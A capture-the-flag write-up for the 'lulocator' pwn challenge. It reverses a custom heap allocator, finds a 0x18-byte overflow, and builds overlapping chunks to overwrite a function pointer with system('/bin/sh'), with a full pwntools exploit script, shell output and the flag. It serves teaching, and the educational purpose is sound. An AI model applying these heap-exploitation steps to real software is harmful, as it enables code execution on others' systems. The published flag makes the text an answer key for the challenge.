Lulocator

Eh4x CTF by smothy

lulocator - EH4X CTF 2026

Category: Binary Exploitation | Points: 500 | Solves: 0 (first blood baby) | Author: nrg & the_moon_guy

Who needs that buggy malloc? Made my own completely safe lulocator.

nc chall.ehax.in 40137


TL;DR

Custom heap allocator with a write command that accepts up to size + 0x18 bytes into a buffer that only holds size bytes. Classic off-by-one, or rather off-by-twenty-four. We inflate a freed chunk's size header, get an overlapping allocation over a victim object, overwrite its function pointer with system, fill its data with /bin/sh, and pop a shell.


0x00 - First Look

We get a stripped ELF binary and a libc (glibc 2.35). Let's check what we're working with:

$ pwn checksec lulocator
    Arch:     amd64-64-little
    RELRO:    No RELRO            <-- GOT is writable, free real estate
    Stack:    No canary found     <-- stack smash? maybe later
    NX:       NX enabled          <-- no shellcode on stack/heap
    PIE:      No PIE (0x400000)   <-- addresses are fixed, nice

No PIE + No RELRO is basically the binary saying "please hack me bro".

The binary presents a menu-driven heap challenge:

=== lulocator ===
1) new         -- allocate an object with custom size
2) write       -- write data to an object
3) delete      -- free an object
4) info        -- leak object address + stdout ptr + size
5) set_runner  -- pick an object as "the runner"
6) run         -- call runner->func_ptr(runner->data)
7) quit

So we have a classic note-style pwn challenge but with a twist - there's a custom allocator ("lulocator") instead of glibc malloc, and objects have a function pointer that gets called via run. That function pointer is our ticket to code execution.


0x01 - Reversing the Allocator

Since the binary is stripped, we gotta reverse everything from raw disassembly. Here's what I figured out:

The Arena

The allocator mmaps a 0x40000-byte region at startup. It uses a simple bump allocator for new allocations and a circular doubly-linked free list for freed chunks. The free list sentinel lives at a fixed address 0x404850 in .data (no PIE = we know this address).

Chunk Layout

Each chunk on the heap looks like:

+----------+---------------------------+
|  Header  |           Data            |
| (8 bytes)|   (aligned to 16 bytes)   |
+----------+---------------------------+
     ^
     |
     +-- size | flags (bit 0 = allocated)

  • header & ~0xF = chunk size (total, including header)
  • header & 1 = allocated bit (1 = in use, 0 = free)
  • When free, the data area stores: fwd pointer (8 bytes) + bwd pointer (8 bytes)
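
The header encoding above can be sketched in a few lines of Python. This is a minimal model based only on the two masks listed in the bullets; the helper names decode_header and encode_header are made up for illustration and do not come from the binary.

```python
ALLOCATED_BIT = 0x1   # bit 0 of the header marks the chunk as in use
SIZE_MASK = ~0xF      # low 4 bits are flag space, the rest is the chunk size


def decode_header(header):
    """Split a raw 8-byte chunk header into (chunk_size, is_allocated)."""
    return header & SIZE_MASK, bool(header & ALLOCATED_BIT)


def encode_header(chunk_size, allocated):
    """Build a header value from a 16-byte-aligned chunk size and the flag."""
    if chunk_size & 0xF:
        raise ValueError("chunk size must be 16-byte aligned")
    return chunk_size | (ALLOCATED_BIT if allocated else 0)


# 0x41 is the header of an in-use 0x40 chunk; 0x80 is a free 0x80 chunk.
print(decode_header(0x41))
print(decode_header(0x80))
print(hex(encode_header(0x40, True)))
```

These two values (0x41 and 0x80) are exactly the headers that show up later in the exploit payloads.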

Object Layout

When you do new(size), the allocator does lu_alloc(size + 0x28). The returned memory is laid out as:

Object structure (returned by lu_alloc):
  +0x00: field_0   (8 bytes)  -- unused, zeroed
  +0x08: field_1   (8 bytes)  -- unused, zeroed
  +0x10: func_ptr  (8 bytes)  -- function pointer (default: print_mail)
  +0x18: out_ptr   (8 bytes)  -- FILE* stdout
  +0x20: size      (8 bytes)  -- user-requested size
  +0x28: data[size]           -- user data buffer

The run command does: runner->func_ptr(runner + 0x28) -- it calls the function pointer with a pointer to the data buffer as the argument.

If we can overwrite func_ptr to system and put /bin/sh in the data buffer... game over.
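
To make the object layout concrete, here is a small sketch that packs and parses an object with Python's struct module. The offsets come from the layout above; the pointer values and the parse_object helper are invented for illustration only.

```python
import struct

# Field offsets inside an object, as reversed in this writeup.
OFF_FUNC_PTR = 0x10
OFF_OUT_PTR = 0x18
OFF_SIZE = 0x20
OFF_DATA = 0x28


def parse_object(raw):
    """Decode the 0x28-byte object metadata followed by the data buffer."""
    field_0, field_1, func_ptr, out_ptr, size = struct.unpack_from("<5Q", raw, 0)
    return {
        "func_ptr": func_ptr,
        "out_ptr": out_ptr,
        "size": size,
        "data": raw[OFF_DATA:OFF_DATA + size],
    }


# Made-up pointer values, purely for illustration.
raw = struct.pack("<5Q", 0, 0, 0x401234, 0x7F12345BF780, 0x10)
raw += b"hello".ljust(0x10, b"\x00")

obj = parse_object(raw)
print(hex(obj["func_ptr"]), obj["size"], obj["data"][:5])
```

Five 8-byte fields add up to 0x28, which is why run passes runner + 0x28 as the argument.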

[Figure: Before/After]


0x02 - Finding the Bug

Here's the write command logic (simplified pseudocode):

c
void cmd_write(void) {
    int idx = read_int("idx: ");
    obj_t *obj = slots[idx];
    uint64_t len = read_ull("len: ");

    // THE BUG IS RIGHT HERE OFFICER
    if (len > obj->size + 0x18) {
        puts("too long");
        return;
    }

    read_all(0, obj->data, len);   // reads into data buffer
    // ... null termination ...
}

The check allows writing up to obj->size + 0x18 bytes, but the data buffer is only obj->size bytes long.

That's a 0x18 (24) byte heap overflow.

[Figure: Heap Overflow]

24 bytes overflow means we can corrupt:

  • 8 bytes of the next chunk's header
  • 8 bytes of the next chunk's data[0] (fwd pointer if free)
  • 8 bytes of the next chunk's data[8] (bwd pointer if free)
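
The reach of the overflow can be modeled as follows. This sketch assumes the data buffer ends exactly at the chunk boundary, which holds for size=0x10 (0x8 + 0x28 + 0x10 = 0x40) but not for sizes that leave alignment padding. The overflow_targets helper is a made-up name.

```python
OVERFLOW_SLACK = 0x18  # extra bytes the buggy length check allows

# 8-byte slots that follow the data buffer, in memory order.
SLOTS = [
    "next chunk header",
    "next chunk +0x08 (fwd if free)",
    "next chunk +0x10 (bwd if free)",
]


def overflow_targets(nbytes_past_end):
    """Name each 8-byte slot touched by writing this many bytes past the buffer."""
    if not 0 <= nbytes_past_end <= OVERFLOW_SLACK:
        raise ValueError("the write command rejects this length")
    touched = (nbytes_past_end + 7) // 8  # a partially written slot counts too
    return SLOTS[:touched]


for extra in (0, 8, 0x18):
    print(hex(extra), overflow_targets(extra))
```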

0x03 - The Leak (free info lol)

The info command is literally handing us addresses on a silver platter:

[info] addr=0x7f1234560008 out=0x7f12345bf780 len=16
                               ^^^ This is stdout (FILE*) = libc address!

The out field contains the address of _IO_2_1_stdout_ inside libc. Since we know the libc version (2.35), we just subtract the known offset to get libc base:

python
libc_base = leaked_stdout - 0x21b780   # offset of _IO_2_1_stdout_ in libc 2.35
system    = libc_base + 0x50d70        # offset of system()

That was easy. Thanks for the free leak, challenge author.
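
As a standalone sanity check, the leak arithmetic can be run against the sample info line above without touching the remote. The offsets are the ones quoted in this writeup; parse_info and resolve_system are illustrative helper names, and the page-alignment test is an extra guard I added, not something the challenge requires.

```python
import re

LIBC_STDOUT = 0x21B780  # offset of _IO_2_1_stdout_ quoted in this writeup
LIBC_SYSTEM = 0x50D70   # offset of system() quoted in this writeup


def parse_info(line):
    """Extract (addr, out) from an '[info] addr=0x... out=0x... len=N' line."""
    m = re.search(r"addr=(0x[0-9a-fA-F]+)\s+out=(0x[0-9a-fA-F]+)", line)
    if m is None:
        raise ValueError("unexpected info line: %r" % line)
    return int(m.group(1), 16), int(m.group(2), 16)


def resolve_system(stdout_leak):
    """Turn a leaked stdout pointer into (libc_base, system_address)."""
    libc_base = stdout_leak - LIBC_STDOUT
    if libc_base & 0xFFF:
        # A libc base is page aligned; anything else hints at a wrong libc build.
        raise ValueError("libc base is not page aligned")
    return libc_base, libc_base + LIBC_SYSTEM


_, out = parse_info("[info] addr=0x7f1234560008 out=0x7f12345bf780 len=16")
base, system = resolve_system(out)
print(hex(base), hex(system))
```

If the alignment check fails against the real target, the remote libc is most likely a different build than the one the offsets were taken from.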


0x04 - The Exploit Strategy: Overlapping Chunks

OK so we have a 24-byte overflow and we need to overwrite an object's func_ptr at offset +0x10. After the next chunk's 8-byte header, the overflow only reaches the first 16 bytes of the next object (field_0 and field_1 at offsets +0x00 and +0x08), which stops just short of func_ptr.

But we can do something sneaky: inflate a freed chunk's size to create an overlapping allocation.

Here's the plan:

Step 1: Set up the heap

Allocate A (size=0x10)  -->  slot 0, chunk size 0x40
Allocate B (size=0x10)  -->  slot 1, chunk size 0x40
Allocate C (size=0x10)  -->  slot 2, chunk size 0x40

Heap layout:
+--------+--------+--------+
| A 0x40 | B 0x40 | C 0x40 |
+--------+--------+--------+

Step 2: Free B

B goes to the free list. Its header now says size=0x40 (allocated bit cleared), and its data area contains fwd/bwd pointers to the sentinel (0x404850).

[Figure: Heap State]

Step 3: Overflow from A into B

Write 0x28 bytes to A (that's 0x10 of legit data + 0x18 overflow):

python
overflow = b'A' * 0x10       # A's data (padding)
overflow += p64(0x80)        # B's header: inflate 0x40 -> 0x80 !!
overflow += p64(0x404850)    # B->fwd: keep valid (sentinel)
overflow += p64(0x404850)    # B->bwd: keep valid (sentinel)

Key insight: we keep the fwd/bwd pointers correct so the safe-unlink integrity check passes when B is reallocated. The allocator checks fwd->bwd == node && bwd->fwd == node before unlinking. Since B is the only element on the free list, both fwd and bwd point to the sentinel, and the sentinel's fwd/bwd both point to B. Our overflow rewrites fwd/bwd with the same values they already held, so the check passes.
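
Here is a toy model of that check, to show why the inflated size goes unnoticed. It assumes each node stores fwd at +0 and bwd at +8 and that pointers refer to the node's fwd field; the real allocator's node addressing was not confirmed beyond the check itself, and the address 0x1000 for B is made up.

```python
SENTINEL = 0x404850


class FreeList:
    """Toy circular doubly-linked list; memory is a dict of address -> qword."""

    def __init__(self):
        # An empty list: the sentinel points at itself in both directions.
        self.mem = {SENTINEL: SENTINEL, SENTINEL + 8: SENTINEL}

    def insert(self, node):
        """Link node right after the sentinel."""
        old_first = self.mem[SENTINEL]
        self.mem[node] = old_first        # node->fwd
        self.mem[node + 8] = SENTINEL     # node->bwd
        self.mem[old_first + 8] = node    # old_first->bwd
        self.mem[SENTINEL] = node         # sentinel->fwd

    def unlink(self, node):
        """Safe unlink: verify fwd->bwd == node and bwd->fwd == node first."""
        fwd, bwd = self.mem[node], self.mem[node + 8]
        if self.mem.get(fwd + 8) != node or self.mem.get(bwd) != node:
            raise RuntimeError("corrupted free list")
        self.mem[bwd] = fwd
        self.mem[fwd + 8] = bwd


B = 0x1000  # hypothetical address of B's fwd field
fl = FreeList()
fl.insert(B)
# The overflow rewrites both links with the values they already had.
fl.mem[B] = SENTINEL
fl.mem[B + 8] = SENTINEL
fl.unlink(B)  # passes: nothing here ever looks at the size header
print("unlink ok, list empty:", fl.mem[SENTINEL] == SENTINEL)
```

Writing any other value into fwd or bwd makes unlink raise, which is why the payload carries the sentinel address twice.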

+--------+-------------------+
| A 0x40 | B "FREE" sz=0x80  |  <-- B now thinks it's 0x80 bytes
|        | (covers B AND C!) |
+--------+-------------------+

[Figure: Overflow Detail]

Step 4: Allocate D (size=0x50) - gets the inflated chunk

When we allocate D with size 0x50, the allocator needs a chunk of total size align16(0x50 + 0x28 + 0x8) = 0x80. It finds B on the free list with (fake) size 0x80 -- perfect fit! D gets allocated right on top of B's old location, but its data area now extends into C's territory.
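
The size arithmetic is easy to double-check. This sketch uses the formula stated above (user size + 0x28 object metadata + 0x8 chunk header, rounded up to 16); the function names are illustrative.

```python
HEADER_SIZE = 0x8    # chunk header
OBJECT_META = 0x28   # object fields that precede data[]


def align16(n):
    """Round n up to the next multiple of 16."""
    return (n + 0xF) & ~0xF


def chunk_size(user_size):
    """Total chunk size the allocator needs for new(user_size)."""
    return align16(user_size + OBJECT_META + HEADER_SIZE)


for req in (0x10, 0x50):
    print(hex(req), "->", hex(chunk_size(req)))
```

A request of 0x10 yields the 0x40 chunks used for A, B, and C, and 0x50 is the request whose chunk size matches the forged 0x80 header.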

+--------+----------------------------------+
| A 0x40 |          D (size=0x50)           |
|        | D_meta | D_data[0x50]            |
|        |        | .....|C_hdr|C_meta|C_dat|
+--------+----------------------------------+
                    ^       ^      ^
                    |       |      |
          We control ALL of this through D's write!

Step 5: Write through D to corrupt C

Now we write to D's data area. Since D overlaps with C, we can overwrite C's entire object metadata:

python
payload  = b'\x00' * 0x10     # gap (D data before C starts)
payload += p64(0x41)           # C's chunk header (keep original)
payload += p64(0)              # C->field_0
payload += p64(0)              # C->field_1
payload += p64(system_addr)    # C->func_ptr = system()  <-- BOOM
payload += p64(0)              # C->out_ptr
payload += p64(0x10)           # C->size
payload += b'/bin/sh\x00'      # C->data = "/bin/sh"
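
The 0x10 gap and the position of func_ptr can be verified offline. This sketch rebuilds the same payload with struct instead of pwntools and measures offsets relative to B's chunk header; the system address is a placeholder value, and build_payload is a made-up helper.

```python
import struct


def p64(value):
    """Pack a 64-bit little-endian integer (stand-in for pwntools' p64)."""
    return struct.pack("<Q", value)


# Offsets relative to the start of B's chunk (which D now occupies).
B_CHUNK = 0x00
C_CHUNK = B_CHUNK + 0x40          # C starts right after the original 0x40 chunk
D_DATA = B_CHUNK + 0x8 + 0x28     # chunk header + object metadata
GAP = C_CHUNK - D_DATA            # bytes of D's data before C's header


def build_payload(system_addr):
    """Return (payload, offset of func_ptr inside the payload)."""
    payload = b"\x00" * GAP
    payload += p64(0x41)           # C's chunk header, unchanged
    payload += p64(0) * 2          # field_0, field_1
    func_ptr_off = len(payload)
    payload += p64(system_addr)    # C->func_ptr
    payload += p64(0)              # C->out_ptr
    payload += p64(0x10)           # C->size
    payload += b"/bin/sh\x00"      # C->data
    return payload, func_ptr_off


payload, off = build_payload(0x4141414141414141)  # placeholder address
print(hex(GAP), hex(off), hex(len(payload)))
```

The payload is 0x48 bytes long, so it fits inside D's 0x50-byte buffer without needing the overflow a second time.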

Step 6: Set runner to C and RUN

python
set_runner(c_idx)   # runner = C
run()               # calls C->func_ptr(C->data) = system("/bin/sh")

set_runner(C)  --->  runner = C
run()          --->  C->func_ptr(C + 0x28)  --->  system("/bin/sh")

0x05 - Putting It All Together

Here's the full attack flow as a diagram:

[Figure: 6-Step Attack Flow]


0x06 - The Exploit Script

python
#!/usr/bin/env python3
from pwn import *

context.arch = 'amd64'

# Libc offsets (glibc 2.35 - Ubuntu)
LIBC_STDOUT = 0x21b780
LIBC_SYSTEM = 0x50d70
SENTINEL    = 0x404850       # free list sentinel (no PIE = fixed addr)

p = remote('chall.ehax.in', 40137)
p.recvuntil(b'=== lulocator ===')

# --- Helper functions ---
def new(size):
    p.sendlineafter(b'> ', b'1')
    p.sendlineafter(b'size: ', str(size).encode())
    p.recvuntil(b'[new] index=')
    return int(p.recvline().strip())

def write(idx, data):
    p.sendlineafter(b'> ', b'2')
    p.sendlineafter(b'idx: ', str(idx).encode())
    p.sendlineafter(b'len: ', str(len(data)).encode())
    p.sendafter(b'data: ', data)
    p.recvuntil(b'[wrote]')

def delete(idx):
    p.sendlineafter(b'> ', b'3')
    p.sendlineafter(b'idx: ', str(idx).encode())
    p.recvuntil(b'[deleted]')

def info(idx):
    p.sendlineafter(b'> ', b'4')
    p.sendlineafter(b'idx: ', str(idx).encode())
    line = p.recvline_contains(b'[info]').decode()
    parts = line.split()
    addr = int(parts[1].split('=')[1], 16)
    out  = int(parts[2].split('=')[1], 16)
    return addr, out

def set_runner(idx):
    p.sendlineafter(b'> ', b'5')
    p.sendlineafter(b'idx: ', str(idx).encode())
    p.recvuntil(b'[runner set]')

def run():
    p.sendlineafter(b'> ', b'6')

# === PHASE 1: LEAK ===
A = new(0x10)                          # slot 0
_, stdout_leak = info(A)
libc_base = stdout_leak - LIBC_STDOUT
system    = libc_base + LIBC_SYSTEM
log.success(f"libc: {hex(libc_base)}")
log.success(f"system: {hex(system)}")

# === PHASE 2: SETUP ===
B = new(0x10)                          # slot 1 (sacrifice)
C = new(0x10)                          # slot 2 (target)
delete(B)                              # B -> free list

# === PHASE 3: OVERFLOW & INFLATE ===
overflow  = b'A' * 0x10                # A's data (junk)
overflow += p64(0x80)                  # inflate B's size: 0x40 -> 0x80
overflow += p64(SENTINEL)              # keep fwd valid
overflow += p64(SENTINEL)              # keep bwd valid
write(A, overflow)

# === PHASE 4: OVERLAPPING ALLOC ===
D = new(0x50)                          # gets inflated B, overlaps C

# === PHASE 5: CORRUPT C ===
payload  = b'\x00' * 0x10              # gap
payload += p64(0x41)                   # C chunk header
payload += p64(0) * 2                  # field_0, field_1
payload += p64(system)                 # C->func_ptr = system
payload += p64(0)                      # C->out_ptr
payload += p64(0x10)                   # C->size
payload += b'/bin/sh\x00'              # C->data
write(D, payload)

# === PHASE 6: PROFIT ===
set_runner(C)
run()                                  # system("/bin/sh")

p.interactive()

0x07 - Shell!

$ python3 exploit.py
[+] Opening connection to chall.ehax.in on port 40137: Done
[+] libc: 0x765e68e9f000
[+] system: 0x765e68eefd70
[*] Switching to interactive mode
$ id
uid=1000(ctf) gid=1000(ctf) groups=1000(ctf)
$ cat flag*
EH4X{unf0rtun4t3ly_th3_lul_1s_0n_m3}

0x08 - Key Takeaways (educational stuff)

Why did this work?

Protection | Status | Impact
PIE        | OFF    | All binary addresses are fixed -- we know the sentinel at 0x404850
RELRO      | None   | GOT is writable (didn't even need it, but nice to have)
Canary     | OFF    | Stack smashing possible (didn't need it either)
NX         | ON     | Can't exec shellcode on heap/stack, so we use system()

Concepts used in this exploit:

  1. Heap Overflow -- The write command has an off-by-0x18 bug. Always check boundary conditions on every write into a heap buffer! The check was len <= size + 0x18 instead of len <= size.

  2. Chunk Size Inflation -- By overwriting a free chunk's size header to a larger value, we trick the allocator into returning an allocation that overlaps with adjacent chunks. This is a classic heap exploitation primitive.

  3. Overlapping Allocations -- Once we have a chunk that overlaps another object, we can read/write the victim object's internal metadata through the overlapping chunk.

  4. Function Pointer Hijack -- The object had a function pointer at a known offset. By overwriting it to system() and controlling the argument (the data buffer), we achieve arbitrary command execution.

  5. Free List Integrity Bypass -- The allocator had a safe-unlink check (fwd->bwd == node && bwd->fwd == node). We bypassed it by keeping the fwd/bwd pointers valid during our overflow. The check only verifies link consistency, not size consistency.
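
For takeaway 1, the difference between the buggy and the intended bounds check fits in a few lines. This is a model of the two conditions only, written in Python for consistency with the exploit; the function names are made up and the binary's actual code is the C pseudocode shown earlier.

```python
OVERFLOW_SLACK = 0x18  # the stray constant in the length check


def buggy_check(length, size):
    """What the binary does: accept up to size + 0x18 bytes."""
    return length <= size + OVERFLOW_SLACK


def fixed_check(length, size):
    """What it should do: accept at most size bytes."""
    return length <= size


size = 0x10
# Every length the buggy check lets through that the fixed one would reject.
dangerous = [
    n for n in range(size + OVERFLOW_SLACK + 1)
    if buggy_check(n, size) and not fixed_check(n, size)
]
print(hex(dangerous[0]), hex(dangerous[-1]), len(dangerous))
```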

The vulnerability in one picture:

[Figure: Vulnerability Summary]

Similar real-world bugs:

  • CVE-2021-27365 (Linux kernel iSCSI) -- heap buffer overflow due to incorrect size check
  • Pretty much any custom allocator that rolls its own bounds checking instead of using well-tested implementations

The lesson? Don't write your own malloc unless you really know what you're doing.


Flag: EH4X{unf0rtun4t3ly_th3_lul_1s_0n_m3}

unfortunately the lul is on me -- yeah, it really was on the lulocator lol


GG to nrg & the_moon_guy for a clean pwn challenge. 500 points well earned.